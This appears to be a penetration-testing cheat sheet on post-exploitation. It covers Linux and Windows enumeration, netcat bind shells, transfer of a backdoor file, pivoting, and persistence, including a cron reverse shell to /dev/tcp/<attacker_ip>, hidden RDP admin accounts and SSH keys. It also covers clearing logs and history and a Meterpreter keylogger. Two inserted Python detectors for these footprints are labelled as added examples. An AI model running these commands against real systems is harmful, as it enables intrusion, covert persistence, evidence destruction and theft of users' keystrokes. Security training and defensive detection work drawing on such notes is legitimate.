Post-Exploitation & Commands

Useful Commands

Linux

ctrl + c # Terminate the currently running command
ctrl + r # Search the current terminal session's command history
ctrl + a # Go to the start of the line
ctrl + e # Go to the end of the line
ctrl + z # Suspend (background) the foreground program

# Files
base64 -w 0 file.txt             # Encode file to Base64
wc -l file.txt                   # Count Lines
wc -c file.txt                   # Count Chars
cat file.txt | sort | uniq       # Sort and delete duplicates
sed -i 's/OLD/NEW/g' file.txt    # Replace string inside a file
ls -al /etc/cron*                # List everything under /etc whose name starts with "cron"
cat /etc/cron*                   # Display the contents of all cron* files

# Decompress
7z x file.7z                 # .7z            ("x" is the extract command, not a flag)
bzip2 -d file.bz2            # .bz2
gunzip file.gz               # .gz
tar -xvzf file.tar.gz        # .tar.gz
tar -jxf file.tar.bz2        # .tar.bz2
tar -xvjf file.tbz           # .tbz
tar -xvzf file.tgz           # .tgz
unzip file.zip               # .zip
unxz file.xz                 # .xz            (apt install xz-utils)

# Clipboard
xclip -sel c < file.txt      # Copy the contents of file.txt to the clipboard

# Search strings inside files
grep -ri password             # Search for "password" (case insensitive) in all files under the current directory, recursively
grep -Ei 'pass|user' file.txt # Search for "pass" or "user" in file.txt
grep -Eri 'pass|user'         # Search for "pass" or "user" in all files under the current directory, recursively
# with color, ignore binaries (-I), print line number (-n) and redirect errors
grep --color=auto -rn -iIE "PASSW|PWD" 2>/dev/null

# Change user: root
su
# Change user: <username>
su <username>
# Change a Linux user's password (copy the output and paste it into the user's entry in /etc/shadow)
openssl passwd -1 -salt <salt> <new_pass> # -1 = MD5-crypt (weakest), -6 = SHA-512-crypt (strongest)

Enumeration

# System info
cat /etc/os-release # Print linux distro version
cat /etc/issue      # Print linux distro version 
lsb_release -a      # Print linux distro version
uname -a            # Print kernel name, version and machine architecture
env                 # Print environment variables
lscpu               # Hardware info
free -h             # RAM usage
df -h               # Disk usage
dpkg -l             # List packages installed with version

# Enumerate Users
whoami
groups <user>
useradd -m <user> -s /bin/bash # Creates a user
usermod -aG root <user>        # Add <user> to the root group
lastlog                        # Most recent login of every user
last                           # Log of users logged in

# Enumerate Network
ip a                 # Interfaces and addresses (also reveals other networks the host is attached to)
cat /etc/hostname    # Display hostname
cat /etc/hosts       # Static IP-to-hostname mappings (useful to discover internal hosts you can reach)
cat /etc/resolv.conf # Display the DNS servers in use (often the default gateway)
netstat -tulpn       # Display listening TCP/UDP sockets with their owning PID/program
arp -a               # Display the host ARP cache
route                # View and modify the routing table
# Note: the gateway matters: it may also be the DNS server, the DHCP server, or all of these at once

# Processes & services
ps aux         # Display all processes (output truncated to the terminal width)
ps auxw        # Use 132 columns instead of the terminal width
ps auxww       # Use as many columns as necessary (no truncation)
top            # Dynamic real-time view of the running system (like Task Manager)
crontab -l     # Display the crontab of the current user (root's jobs when run as root)

Windows

:: System info
systeminfo
:: Get current user
whoami  
:: Get current user privileges
whoami /priv
:: Get installed updates. Useful to see which security patches are installed
wmic qfe get Caption,HotFixID,InstalledOn,Description 
:: Adds, displays, or modifies local groups
net localgroup
:: Get group membership of user -> net localgroup administrators
net localgroup <group>
:: Get user info
net user <user>

:: Network Info
ipconfig /all
:: Lists info on tcp/udp ports
netstat -ano
:: Show firewall status for all profiles
netsh advfirewall show allprofiles
:: Display arp table (arp cache to discover other IP addresses on the target network)
arp -a
:: Print route table (useful during the pivoting phase of post-exploitation as it can reveal network routes)
route print

:: Processes & Services
:: Lists services running
net start
:: Same as above with extra details like pid, active state, etc.
wmic service list brief
:: Stop a service
net stop <servicename>
:: List processes with their respective services
tasklist /svc 
:: List scheduled tasks
schtasks /query /fo list /v
:: Automation : JAWS - https://github.com/411Hall/JAWS
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

:: Change Windows user password
net user <username> <new_pass>

Bind Shell

This type of shell is less preferred: the attacker connects inbound to the target, and in most cases ingress traffic is blocked or flagged as suspicious.

# Windows (target)
nc -nvlp <target_port> -e cmd.exe 
nc.exe -nvlp <target_port> -e cmd.exe

# Linux (target)
nc -nvlp <target_port> -e /bin/bash

# Linux (attacker)
nc -nv <target_ip> <target_port>

# Windows (attacker)
nc.exe -nv <target_ip> <target_port>

# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run
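From the defender's side, a bind shell like the ones above shows up as a LISTEN socket owned by a program that should never own one. As an added example (not code from the original notes), this parses `netstat -tulpn` output and flags such listeners; the sample output is constructed, and the allow-list of expected ports is an assumption you would replace with the host's real service inventory.

```python
# Added example: flag suspicious LISTEN sockets in `netstat -tulpn` output,
# the footprint left by e.g. `nc -nvlp <port> -e /bin/bash`. Sample is constructed.
import re

# Programs that normally never own a listening socket on a server.
SUSPICIOUS_PROGRAMS = {"nc", "ncat", "netcat", "nc.traditional", "bash", "sh",
                       "dash", "python", "python3", "perl", "socat"}

# netstat -tulpn columns: Proto Recv-Q Send-Q Local-Address Foreign-Address [State] PID/Program
LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+\S+\s+"
    r"(?P<state>LISTEN)?\s*(?P<pid>\d+|-)(?:/(?P<prog>\S+))?"
)

def parse_netstat(text):
    """Yield one dict per socket line; header and malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr, _, port = m.group("local").rpartition(":")   # handles ":::80" too
        yield {"proto": m.group("proto"), "addr": addr, "port": int(port),
               "state": m.group("state") or "", "pid": m.group("pid"),
               "prog": (m.group("prog") or "").lower()}

def suspicious_listeners(text, expected_ports=frozenset({22, 80, 443})):
    """Return (port, program) for TCP listeners owned by shell/netcat-like programs
    or bound to a port that is not in the expected service inventory (assumed list)."""
    hits = []
    for s in parse_netstat(text):
        if s["state"] != "LISTEN":
            continue
        if s["prog"] in SUSPICIOUS_PROGRAMS or s["port"] not in expected_ports:
            hits.append((s["port"], s["prog"] or "unknown"))   # "-" = PID not visible
    return hits

SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      612/sshd
tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2931/nc
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      801/apache2
udp        0      0 0.0.0.0:68              0.0.0.0:*                           540/dhclient
"""

if __name__ == "__main__":
    for port, prog in suspicious_listeners(SAMPLE):
        print(f"suspicious listener: port {port} owned by {prog}")
```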

Transfer files

# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 127.0.0.1:8080

# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php

# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php         # [recipient]
nc -w 3 <ip> <target_port> < backdoor.php     # [sender]

# With base64
cat file | base64 -w 0 # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file # create file

# Tips
# Tip 1: progress indicator for a netcat transfer
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (requires pv)
# Tip 2: verify the transfer by comparing the MD5 checksum on both ends
md5sum backdoor.php

# Note: netcat "-n" option means no DNS (only IP)

[Fully] interactive shell

Interactive shell

/bin/bash -i # Linux

Fully interactive shell

# Step 1: spawn a pty
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

# Step 2
CTRL + Z # Background the shell and return to your local terminal

# Step 3: disable local echo/line processing, then bring the shell back to the foreground
stty raw -echo; fg

# Step 4
export TERM=xterm

Automatic

# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported. 
# There's basic support (netcat-like interaction + logging)

./penelope.py <port>               # Reverse shell
./penelope.py -c <target> <port>   # Bind shell

Pivoting & Port forwarding

Metasploit (meterpreter) - Autoroute: whenever we want to reach a machine in one of the specified networks, the traffic is routed through the meterpreter session, which connects to the target on our behalf.

# Find subnet (the 2nd target host may be in other network)
ipconfig                     # IP: 19.9.29.148. Netmask: 255.255.240.0

# Add routes
run autoroute -s <subnet>    # Ex: run autoroute -s 19.9.16.0/20 (the network of 19.9.29.148 with mask 255.255.240.0 above)

# Displays active routing table
run autoroute -p

# Now you can scan through the route, e.g. with auxiliary/scanner/portscan/tcp

Notes

  • Scanning with Metasploit is limited (it can't discover software versions, etc.), so it's better to use nmap. To do that we need to perform port forwarding.

  • Since target_sys_2 does not have a route back to attacker_sys, when you use an exploit, use a bind_shell payload. Ex: windows/meterpreter/bind_tcp


Port forwarding (meterpreter/metasploit)

# Forward a remote port to a local port. Here we want to scan port 80 on target 2
portfwd add -l 1234 -p 80 -r <target_sys_2_ip>

portfwd list
nmap -sV -sC -p 1234 localhost

Persistence

Windows

(1) Metasploit module: search for Windows persistence modules. Ex: exploit/windows/local/persistence_service (requires admin or SYSTEM privileges). When you want to connect again, set up a listener to receive the connection.

(2) Enable RDP

  • First way with metasploit: search enable_rdp (and set session). Then connect to victim.

Note: you need a username and password. If you don't have the password, change it with net user <username> <new_pass> (suspicious in a real environment), crack the NTLM hash, or create a new account and add it to the Administrators group.

  • Second way with metasploit/meterpreter (auto create account and settings):

# In meterpreter
run getgui -e -u user_you_want -p password_you_want

# This enables the RDP service ->
# creates a new user with the provided parameters ->
# hides the user from the Windows login screen ->
# adds the user to the Remote Desktop Users and Administrators groups

Linux

(1) Metasploit: search for Linux persistence modules. Example: post/linux/manage/sshkey_persistence (requires elevated privileges; this module adds an SSH key for a specified user)

(2) Via SSH key: after gaining access to a Linux system, you can copy an SSH private key to your local machine and use it to connect via SSH

(3) With cron jobs

# 1. Set up a listener
# 2. Create a cron job (every-minute time format)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron
# 3. This replaces the user's existing crontab with the contents of 'cron'
crontab cron

# Crontab for the current user
crontab -l
# NOTE: if the command doesn't work, try another reverse shell
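The cron entry above is also what a defender should be hunting for in `crontab -l` and /etc/cron* output. As an added example (not code from the original notes), this parses crontab text and flags jobs whose command carries reverse-shell indicators, with an every-minute schedule as an extra signal; the sample crontab and its 10.0.0.5 addresses are constructed.

```python
# Added example: detect crontab persistence entries like
# `* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'`. Sample is constructed.
import re

# (label, pattern) pairs for command fragments typical of reverse shells.
SHELL_INDICATORS = (
    ("dev-tcp", re.compile(r"/dev/(tcp|udp)/")),              # bash network redirection
    ("bash-i", re.compile(r"\bbash\s+-i\b")),                 # interactive bash on a socket
    ("nc-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),  # netcat executing a program
    ("mkfifo", re.compile(r"\bmkfifo\b")),                    # fifo-based shells
    ("socat-exec", re.compile(r"\bsocat\b.*\bexec:", re.I)),  # socat exec shells
)

# Five schedule fields followed by the command.
CRON_LINE_RE = re.compile(r"^(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(.+)$")

def parse_crontab(text):
    """Yield (schedule, command); comments, blanks and VAR=value lines are skipped."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):                  # @reboot, @hourly, ... are one token
            sched, _, cmd = line.partition(" ")
            yield sched, cmd.strip()
            continue
        m = CRON_LINE_RE.match(line)
        if m:
            yield m.group(1), m.group(2)

def suspicious_jobs(text):
    """Return (schedule, command, reasons) for jobs that look like shells; the reason
    'every-minute' is added because persistence entries are usually `* * * * *`."""
    findings = []
    for sched, cmd in parse_crontab(text):
        reasons = [name for name, pat in SHELL_INDICATORS if pat.search(cmd)]
        if not reasons:
            continue
        if sched.split() == ["*"] * 5:
            reasons.append("every-minute")
        findings.append((sched, cmd, reasons))
    return findings

SAMPLE_CRONTAB = """\
# m h dom mon dow command
SHELL=/bin/bash
0 3 * * * /usr/local/bin/backup.sh --quiet
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
@reboot nc 10.0.0.5 4445 -e /bin/sh
"""
```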

Clearing tracks

Windows

# Metasploit/Meterpreter
clearev  # Clear the Application, System, and Security logs on a Windows system

Linux

history -c                          # Clear history
cat /dev/null > ~/.bash_history     # Same as above

Keylogger

# With metasploit
keyscan_start          # Start the keylogger
keyscan_dump           # Print captured keystrokes
